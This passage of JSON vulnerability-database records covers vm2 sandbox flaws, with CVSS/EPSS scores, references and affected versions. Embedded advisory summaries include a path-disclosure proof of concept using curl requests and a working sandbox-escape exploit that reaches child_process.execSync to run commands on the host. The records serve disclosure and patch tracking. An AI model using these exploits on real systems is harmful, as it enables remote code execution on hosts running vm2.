vm.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-32313.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-32313.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-32313","reference_id":"","reference_type":"","scores":[{"value":"0.00668","scoring_system":"epss","scoring_elements":"0.71716","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00712","scoring_system":"epss","scoring_elements":"0.72728","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00712","scoring_system":"epss","scoring_elements":"0.72721","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00712","scoring_system":"epss","scoring_elements":"0.72697","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00712","scoring_system":"epss","scoring_elements":"0.7271","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-32313"},{"reference_url":"https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-22T21:42:52Z/"}],"url":"https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-22T21:42:52Z/"}],"url":"https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.18","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-22T21:42:52Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.18"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2208377","reference_id":"2208377","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2208377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-32313","reference_id":"CVE-2023-32313","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-32313"},{"reference_url":"https://github.com/advisories/GHSA-p5gc-c584-jj6v","reference_id":"GHSA-p5gc-c584-jj6v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p5gc-c584-jj6v"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v","reference_id":"GHSA-p5gc-c584-jj6v","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-22T21:42:52Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/65112?format=json","purl":"pkg:npm/vm2@3.9.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.18"}],"aliases":["CVE-2023-32313","GHSA-p5gc-c584-jj6v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-75hb-ytcw-4khu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42379?format=json","vulnerability_id":"VCID-7k1u-5wfd-sfgn","summary":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nThe package vm2 is vulnerable to Sandbox Bypass via direct access to host error objects generated by node internals during generation of a stacktraces, which can lead to execution of arbitrary code on the host machine.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23555.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23555.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-23555","reference_id":"","reference_type":"","scores":[{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78668","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.7865","published_at":"2026-06-08T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78663","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78672","published_at":"2026-06-06T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78664","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78637","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-23555"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/532120d5cdec7da8225fc6242e154ebabc63fe4d","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/532120d5cdec7da8225fc6242e154ebabc63fe4d"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-VM2-2309905","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-VM2-2309905"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2054114","reference_id":"2054114","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2054114"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23555","reference_id":"CVE-2021-23555","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23555"},{"reference_url":"https://github.com/advisories/GHSA-6pw2-5hjv-9pf7","reference_id":"GHSA-6pw2-5hjv-9pf7","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6pw2-5hjv-9pf7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60608?format=json","purl":"pkg:npm/vm2@3.9.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p1e-z4rv-1bfn"},{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-jv3n-721k-z3h7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.6"}],"aliases":["CVE-2021-23555","GHSA-6pw2-5hjv-9pf7"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7k1u-5wfd-sfgn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/93399?format=json","vulnerability_id":"VCID-8s8x-85t4-m7cg","summary":"vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak\n### Summary\nvm2's `CallSite` wrapper class (intended as a safe wrapper for V8's native CallSite) blocks `getThis()` and `getFunction()` to prevent host object leakage, but allows `getFileName()` to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.\n\n### Details\nIn `lib/setup-sandbox.js:436-466`, the `CallSite` class overrides `getThis()` and `getFunction()` with `undefined` to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:\n\n- `getFileName()` — returns host absolute paths like `/app/node_modules/vm2/lib/vm.js`\n- `getLineNumber()`, `getColumnNumber()` — exact source locations\n- `getFunctionName()`, `getMethodName()`, `getTypeName()` — internal function names\n\nTwo exploitation paths exist:\n1. **Default `error.stack`**: `new Error().stack` includes host frame paths in the formatted string\n2. **Custom `prepareStackTrace`**: Attacker can set `Error.prepareStackTrace` to directly call `getFileName()` on each CallSite, extracting a clean list of all host paths\n\n### PoC\n\n**Library-level PoC (Node.js script — primary):**\n```javascript\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\n// Path A — Default error.stack\nconst result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);\nconsole.log(result1);\n// Output includes: /app/node_modules/vm2/lib/vm.js:289:18\n// /app/src/server.js:49:20\n\n// Path B — prepareStackTrace extraction\nconst result2 = vm.run(`\n Error.prepareStackTrace = function(e, sst) {\n return sst.map(function(s) { return s.getFileName(); }).join(\", \");\n };\n new Error().stack\n`);\nconsole.log(result2);\n// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...\n```\n\n**HTTP demonstration:**\n```bash\n# Default error.stack\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"try { null.x; } catch(e) { e.stack }\"}'\n# Result includes host paths: /app/src/server.js, /app/node_modules/express/...\n\n# prepareStackTrace extraction\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\\\", \\\"); }; new Error().stack\"}'\n# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...\n```\n\n### Impact\n- **Information Disclosure**: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.\n- **Attack Chain**: Leaked paths enable precise targeting for other vulnerabilities.\n- **Scope**: All applications using vm2. No special configuration required.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44002","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11077","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.1101","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10996","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.1112","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11113","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44002"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T18:23:24Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44002","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44002"},{"reference_url":"https://github.com/advisories/GHSA-v27g-jcqj-v8rw","reference_id":"GHSA-v27g-jcqj-v8rw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v27g-jcqj-v8rw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44002","GHSA-v27g-jcqj-v8rw"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8s8x-85t4-m7cg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45185?format=json","vulnerability_id":"VCID-d6mv-1b7h-5fef","summary":"Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')\nvm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-32314.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-32314.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-32314","reference_id":"","reference_type":"","scores":[{"value":"0.61685","scoring_system":"epss","scoring_elements":"0.9836","published_at":"2026-06-08T12:55:00Z"},{"value":"0.61685","scoring_system":"epss","scoring_elements":"0.98358","published_at":"2026-06-09T12:55:00Z"},{"value":"0.64898","scoring_system":"epss","scoring_elements":"0.98491","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-32314"},{"reference_url":"https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-01-22T21:42:22Z/"}],"url":"https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-01-22T21:42:22Z/"}],"url":"https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.18","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-01-22T21:42:22Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.18"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2208376","reference_id":"2208376","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2208376"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-32314","reference_id":"CVE-2023-32314","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-32314"},{"reference_url":"https://github.com/advisories/GHSA-whpj-8f3w-67p5","reference_id":"GHSA-whpj-8f3w-67p5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-whpj-8f3w-67p5"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5","reference_id":"GHSA-whpj-8f3w-67p5","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-01-22T21:42:22Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/65112?format=json","purl":"pkg:npm/vm2@3.9.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.18"}],"aliases":["CVE-2023-32314","GHSA-whpj-8f3w-67p5"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d6mv-1b7h-5fef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95911?format=json","vulnerability_id":"VCID-ej5b-1m7b-hkf8","summary":"vm2 has a Sandbox Escape Vulnerability\n### Summary\n\nIt is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes\n\n### Details\n\nhttps://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658\n\n`BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)\n\n### PoC\n```js\nlet obj = {\n\tsubarray: Buffer.prototype.inspect,\n\tslice: Buffer.prototype.slice,\n\thexSlice: () => '',\n};\n\nlet sym;\n\nobj.slice(10, {\n\tshowHidden: true,\n\tshowProxy: true,\n\tdepth: 10,\n\tstylize(a) {\n\t\tconst handler = this.seen && this.seen[1];\n\n\t\tif (handler && handler.getPrototypeOf) {\n\t\t\tgP = handler.getPrototypeOf;\n\t\t\tHObjectProto = gP(gP(gP(gP(Buffer))));\n\t\t\tHObject = HObjectProto.constructor;\n\t\t\tsym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);\n\t\t}\n\t\treturn a;\n\t},\n});\n\nobj = {\n\t[sym]: (depth, opt, inspect) => {\n\t\tinspect.constructor('return process')()\n\t\t.getBuiltinModule('child_process')\n\t\t.execSync('id', { stdio: 'inherit' });\n\t},\n\tvalueOf: undefined,\n\tconstructor: undefined,\n};\n\nWebAssembly.compileStreaming(obj).catch(() => {});\n```\n\n### Impact\nSandbox Escape -> RCE","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44006","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19325","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19439","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.1935","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19446","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44006"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-13T18:09:17Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44006","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.